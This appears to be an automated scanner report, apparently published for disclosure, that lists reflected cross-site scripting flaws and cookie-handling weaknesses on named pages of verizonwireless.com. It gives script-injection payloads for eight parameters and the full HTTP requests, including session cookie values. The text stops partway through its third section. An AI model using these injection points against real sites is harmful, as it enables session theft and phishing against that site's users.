Report generated by Hoyt LLC Research at Fri Nov 19 22:05:14 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://www.verizonwireless.com/b2c/store/controller [action parameter]

1.2. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]

1.3. http://www.verizonwireless.com/b2c/store/controller [item parameter]

1.4. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]

1.5. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]

1.6. http://www.verizonwireless.com/b2c/vzwfly [go parameter]

1.7. http://www.verizonwireless.com/b2c/vzwfly [name of an arbitrarily supplied request parameter]

1.8. http://www.verizonwireless.com/b2c/vzwfly [query parameter]

2. Cookie without HttpOnly flag set

2.1. http://www.verizonwireless.com/b2c/index.html

2.2. http://www.verizonwireless.com/b2c/store/controller

2.3. http://www.verizonwireless.com/js/shared/hbx/hbx.js

3. Cookie scoped to parent domain

4. Cross-domain Referer leakage

4.1. http://www.verizonwireless.com/b2c/store/controller

4.2. http://www.verizonwireless.com/b2c/vzwfly

5. Cross-domain script include

5.1. http://www.verizonwireless.com/b2c/index.html

5.2. http://www.verizonwireless.com/b2c/store/controller

5.3. http://www.verizonwireless.com/b2c/vzwfly



1. Cross-site scripting (reflected)  next
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.verizonwireless.com/b2c/store/controller [action parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a0a"><script>alert(1)</script>ce4edd3e009 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDeviceb1a0a"><script>alert(1)</script>ce4edd3e009&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217144943; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDeviceb1a0a"><script>alert(1)</script>ce4edd3e009&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

1.2. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the deviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637b8"><script>alert(1)</script>f8543ce74dd was submitted in the deviceType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones637b8"><script>alert(1)</script>f8543ce74dd&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:07 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217147101; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones637b8"><script>alert(1)</script>f8543ce74dd&sortOption=priceSort" />
...[SNIP]...

1.3. http://www.verizonwireless.com/b2c/store/controller [item parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the item request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba5a"><script>alert(1)</script>70fff072cf3 was submitted in the item parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirstdba5a"><script>alert(1)</script>70fff072cf3&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217142586; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirstdba5a"><script>alert(1)</script>70fff072cf3&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

1.4. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965b3"><script>alert(1)</script>021e0c9eefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&965b3"><script>alert(1)</script>021e0c9eefd=1 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217149624; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&965b3"><script>alert(1)</script>021e0c9eefd=1" />
...[SNIP]...

1.5. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the sortOption request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52fd0"><script>alert(1)</script>f8982710445 was submitted in the sortOption parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort52fd0"><script>alert(1)</script>f8982710445 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217149341; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort52fd0"><script>alert(1)</script>f8982710445" />
...[SNIP]...

1.6. http://www.verizonwireless.com/b2c/vzwfly [go parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The value of the go request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3efe"><script>alert(1)</script>c43e1d77ad was submitted in the go parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/vzwfly?go=/ContactUsControllerServleta3efe"><script>alert(1)</script>c43e1d77ad HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://aboutus.vzw.com/leadership/executive/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:11 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/ContactUsControllerServleta3efe"><script>alert(1)</script>c43e1d77ad" />
...[SNIP]...

1.7. http://www.verizonwireless.com/b2c/vzwfly [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec15"><script>alert(1)</script>aa80984e70d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/vzwfly?go=/ContactUsControllerServlet&3ec15"><script>alert(1)</script>aa80984e70d=1 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://aboutus.vzw.com/leadership/executive/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:12 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/ContactUsControllerServlet&3ec15"><script>alert(1)</script>aa80984e70d=1" />
...[SNIP]...

1.8. http://www.verizonwireless.com/b2c/vzwfly [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f155"><script>alert(1)</script>3108fa274df22e375 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /b2c/vzwfly?query=go%3D%2FContactUsControllerServlet7f155"><script>alert(1)</script>3108fa274df22e375&fd=&go=%2FContactUsControllerServlet&zipcode=&rememberMyZip=&state=&prevstate=&change=&filter= HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/vzwfly?go=/ContactUsControllerServlet
Cache-Control: max-age=0
Origin: http://www.verizonwireless.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=96859928

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:42 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="query=go%3D%2FContactUsControllerServlet7f155"><script>alert(1)</script>3108fa274df22e375&fd=&go=%2FContactUsControllerServlet&zipcode=&rememberMyZip=&state=&prevstate=&change=&filter=" />
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.verizonwireless.com/b2c/index.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:38:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GLOBALID=RKn%2BoQVp8VV4LuzvNA00RedqiB73Is%2FrdrsiPXoeN9KL2yyW%2Bmry0Q9JORO%2BJI8J; domain=.verizonwireless.com; expires=Sunday, 20-Nov-2011 01:38:51 GMT; path=/
Set-Cookie: JSESSIONIDB2C=1zL6MnmLbfFKV9WSHvDlDR4dcsgJ9RT60zd20hnSQyWYF9lgXWH2!390044835!venus!5106!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_xxx_xmt_c2d_mcwt=44ac3f0c25c2;path=/
Content-Length: 27628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...

2.2. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:38:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217138196; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...

2.3. http://www.verizonwireless.com/js/shared/hbx/hbx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /js/shared/hbx/hbx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/shared/hbx/hbx.js HTTP/1.1
Accept: */*
Referer: http://news.vzw.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 04 Sep 2007 21:21:48 GMT
If-None-Match: "3cb6-46ddcc6c"
Host: www.verizonwireless.com
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 304 Use local copy
Server: None
Date: Sat, 20 Nov 2010 01:33:30 GMT
Etag: "3cb6-46ddcc6c"
Set-Cookie: NSC_xxx_hwt=ec2016f80000;path=/


3. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

